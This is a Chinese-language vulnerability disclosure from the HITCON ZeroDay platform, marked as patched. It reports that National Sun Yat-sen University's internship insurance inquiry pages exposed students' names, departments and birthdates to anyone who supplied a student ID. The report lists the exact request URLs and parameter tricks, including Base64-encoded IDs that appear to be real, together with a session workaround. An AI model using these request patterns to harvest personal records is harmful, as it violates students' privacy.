國立中山大學學生出生年月日外洩 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

ZDID: ZD-2024-00659
發信 Vendor: TACERT台灣學術網路危機處理中心
Title: 國立中山大學學生出生年月日外洩
Introduction: 僅需學號可獲得歷屆(含在校生)學生的姓名與出生年月日

處理狀態

目前狀態

公開

Last Update : 2024/07/25

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2024/06/08 20:54:02 : 新提交 (由 Friday_player 更新此狀態)
2024/06/08 20:56:22 : 新提交 (由 Friday_player 更新此狀態)
2024/06/09 00:01:12 : 新提交 (由 Friday_player 更新此狀態)
2024/06/09 00:03:06 : 新提交 (由 Friday_player 更新此狀態)
2024/06/09 00:04:53 : 新提交 (由 Friday_player 更新此狀態)
2024/06/10 03:55:40 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/06/12 20:18:50 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/06/12 20:18:51 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/17 11:16:27 : 已修補 (由組織帳號更新此狀態)
2024/07/17 19:25:22 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/17 19:25:54 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/17 19:28:33 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/17 19:32:06 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/17 19:55:40 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/17 20:00:32 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/25 03:00:16 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2024-00659
通報者：Fridayer (Friday_player)
風險：高
類型：資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

相關網址

https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID=B*******
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&APFLAG=&ID=B*******
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID=QjEyNjA2MDAzOA==
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&APFLAG=&ID=QjEyNjA2MDAzOA==
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID=B*******&APFLAG=
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID=M*******&APFLAG=
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID=M*******
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&APFLAG=&ID=M*******
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID=TTk0MzAxMDA0NQ==
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&APFLAG=&ID=TTk0MzAxMDA0NQ==
https://sis.nsysu.edu.tw/IIMS/student/IA_CH.php
https://sis.nsysu.edu.tw/IIMS/student/IA_ENG.php

敘述

發現校外實習意外保險申請，僅需學號可任意存取，網址如下：
- https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php
- https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php
參數組合如下：
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID= + 學號
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID= + 學號
E.g. https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID=B1**
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID= + Base64的學號
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID= + Base64的學號
E.g. https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID=TTk0MzAxMDA0NQ==
學號帶入後可獲得個資資訊，可由中英申請頁面獲得學號對應的人員的姓名、系所資訊、出生年月日。
個資顯示網頁如下:
- https://sis.nsysu.edu.tw/IIMS/student/IA_CH.php
- https://sis.nsysu.edu.tw/IIMS/student/IA_ENG.php
發現更新網頁session(PHPSESSION)，瀏覽器可用人工刪除，網頁將會重新獲得SESSION。
再次嘗試用學號(M****)檢視資料頁面，確實可獲得資料。

總結進入該頁面進入方法共有6種(3條路*2結果頁面)路徑，整理如下:

方法一

e.g. https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID=M
e.g. https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID=M
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID= + 學號
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID= + 學號

https://sis.nsysu.edu.tw/IIMS/student/IA_CH.php (結果一)
https://sis.nsysu.edu.tw/IIMS/student/IA_ENG.php (結果二)

方法二

e.g. https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID=TTk0MzAxMDA0NQ==
e.g. https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID=TTk0MzAxMDA0NQ==
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID= + 使用BASE64演算法轉換學生學號
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID= + 使用BASE64演算法轉換學生學號

https://sis.nsysu.edu.tw/IIMS/student/IA_CH.php (結果一)
https://sis.nsysu.edu.tw/IIMS/student/IA_ENG.php (結果二)

方法三

e.g. https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&APFLAG=9527XD&ID=TTk0MzAxMDA0NQ==
e.g. https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&APFLAG=9527XD&ID=TTk0MzAxMDA0NQ==
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry.php?GPID=7&ID= + Base64的學號 + &APFLAG= + 任意值
https://sis.nsysu.edu.tw/IIMS/student/iims_inquiry_en.php?GPID=7&ID= + Base64的學號 + &APFLAG= + 任意值

https://sis.nsysu.edu.tw/IIMS/student/IA_CH.php (結果一)
https://sis.nsysu.edu.tw/IIMS/student/IA_ENG.php (結果二)

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

;